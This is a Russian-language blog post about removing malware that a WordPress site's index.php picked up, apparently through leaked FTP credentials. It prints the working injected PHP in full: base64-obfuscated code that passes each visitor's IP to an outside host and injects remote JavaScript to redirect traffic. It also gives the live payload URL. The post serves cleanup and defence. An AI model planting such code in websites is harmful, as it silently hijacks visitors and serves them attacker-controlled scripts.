Рейтинг@Mail.ru

На сайте обнаружен потенциально опасный код

Leave a Comment / Wordpress / By

Итак, на вашем сайте обнаружен потенциально опасный код.
На страницах сайта обнаружен вредоносный код. На страницах вашего сайта обнаружен код, который может быть опасен для посетителей. В настоящий момент сайт выводится в результатах поиска с пометкой Этот сайт может угрожать безопасности вашего компьютера.


Проверяем сайт онлайн-антивирусом, и выясняем что на странице выполняется непонятный Java-скрипт, а попросту – malware, редиректящий трафик с вашего сайта на подставные для накрутки посещаемости.
http://feelthesame.changeip.name/rsize.js
Понятное дело, что поиском по коду страницы вы ничего не найдете. Скорее всего, вредоносный код прописался в index.php. Вот так выглядит вредоносный ко:

function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$content = @file_get_contents($get);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;

		}
}
collectnewss ();

Как видите, ссылка на левый сайт замаскирована с помощью base64 кодировки, который вызывается здесь же заданной новой функцией. Если раскодировать билеберду в кавычках, то как раз и получаются ссылки на чужие сайты и левые скрипты.
Для Drupal, Joomla и прочих CMS код будет тот же самый, так как он заражает все без разбору. Вычищаем файл, и оставляем заявку на перепроверку сайта. Остается вопрос – как же вирус попал на страницы вашего сайта? Первая мысль – дыра в безопасности движка сайта. Однако чуть позже удалось обнаружить странные подключения к сайту по FTP, а FTP доступ с движком не связан ну никак. Учитывая что сам я во-первых использую сложные пароли и никогда не храню их в открытом виде, а во-вторых редко захожу по FTP, то скорее всего пароли слил сам хостинг-провайдер. Так что меняем все пароли, причем не только на FTP, ну и на всякий случай апдейтим движок сайта до последней версии.

Leave a Comment